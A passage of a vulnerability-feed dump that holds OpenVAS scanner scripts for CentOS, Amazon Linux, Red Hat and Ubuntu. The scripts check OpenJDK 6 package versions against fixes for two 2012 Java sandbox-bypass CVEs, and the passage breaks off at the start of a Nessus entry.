Vulnerability Test\n#\n# CentOS Update for java CESA-2012:1222 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n It was discovered that the Beans component in OpenJDK did not perform\n permission checks properly. An untrusted Java application or applet could\n use this flaw to use classes from restricted packages, allowing it to\n bypass Java sandbox restrictions. (CVE-2012-1682)\n \n A hardening fix was applied to the AWT component in OpenJDK, removing\n functionality from the restricted SunToolkit class that was used in\n combination with other flaws to bypass Java sandbox restrictions.\n (CVE-2012-0547)\n \n This erratum also upgrades the OpenJDK package to IcedTea6 1.10.9. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-September/018840.html\");\n script_id(881483);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:36:07 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:1222\");\n script_name(\"CentOS Update for java CESA-2012:1222 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-17T23:03:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120067", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-119)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120067\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:16:44 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-119)\");\n script_tag(name:\"insight\", value:\"It was discovered that the Beans component in OpenJDK did not perform permission checks properly. An untrusted Java application or applet could use this flaw to use classes from restricted packages, allowing it to bypass Java sandbox restrictions. (CVE-2012-1682 )A hardening fix was applied to the AWT component in OpenJDK, removing functionality from the restricted SunToolkit class that was used in combination with other flaws to bypass Java sandbox restrictions. (CVE-2012-0547 )\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.6.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-119.html\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~52.1.11.4.46.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~52.1.11.4.46.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~52.1.11.4.46.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~52.1.11.4.46.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~52.1.11.4.46.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~52.1.11.4.46.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:57:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "Check for the Version of java-1.6.0-openjdk", "modified": "2018-01-08T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:870820", "href": "http://plugins.openvas.org/nasl.php?oid=870820", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2012:1221-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2012:1221-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n It was discovered that the Beans component in OpenJDK did not perform\n permission checks properly. An untrusted Java application or applet could\n use this flaw to use classes from restricted packages, allowing it to\n bypass Java sandbox restrictions. (CVE-2012-1682)\n\n A hardening fix was applied to the AWT component in OpenJDK, removing\n functionality from the restricted SunToolkit class that was used in\n combination with other flaws to bypass Java sandbox restrictions.\n (CVE-2012-0547)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea6 1.11.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\ntag_affected = \"java-1.6.0-openjdk on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-September/msg00000.html\");\n script_id(870820);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:35:16 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:1221-01\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2012:1221-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.6.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.49.1.11.4.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:1361412562310870821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870821", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2012:1222-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2012:1222-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-September/msg00001.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870821\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:35:22 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-0547\", \"CVE-2012-1682\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:1222-01\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2012:1222-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.6.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"java-1.6.0-openjdk on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n It was discovered that the Beans component in OpenJDK did not perform\n permission checks properly. An untrusted Java application or applet could\n use this flaw to use classes from restricted packages, allowing it to\n bypass Java sandbox restrictions. (CVE-2012-1682)\n\n A hardening fix was applied to the AWT component in OpenJDK, removing\n functionality from the restricted SunToolkit class that was used in\n combination with other flaws to bypass Java sandbox restrictions.\n (CVE-2012-0547)\n\n This erratum also upgrades the OpenJDK package to IcedTea6 1.10.9. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.28.1.10.9.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0547", "CVE-2012-1682"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1553-1", "modified": "2019-03-13T00:00:00", "published": "2012-09-04T00:00:00", "id": "OPENVAS:1361412562310841129", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841129", "type": "openvas", "title": "Ubuntu Update for openjdk-6 USN-1553-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1553_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openjdk-6 USN-1553-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1553-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841129\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:39:18 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2012-1682\", \"CVE-2012-0547\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1553-1\");\n script_name(\"Ubuntu Update for openjdk-6 USN-1553-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|12\\.04 LTS|11\\.10|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1553-1\");\n script_tag(name:\"affected\", value:\"openjdk-6 on Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Beans component in OpenJDK 6 did not\n properly prevent access to restricted classes. A remote attacker could\n use this to create an untrusted Java applet or application that would\n bypass Java sandbox restrictions. (CVE-2012-1682)\n\n It was discovered that functionality in the AWT component in OpenJDK 6\n made it easier for a remote attacker, in conjunction with other\n vulnerabilities, to bypass Java sandbox restrictions. (CVE-2012-0547)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero\", ver:\"6b24-1.11.4-1ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:27:56", "description": "Updated java-1.6.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nIt was discovered that the Beans component in 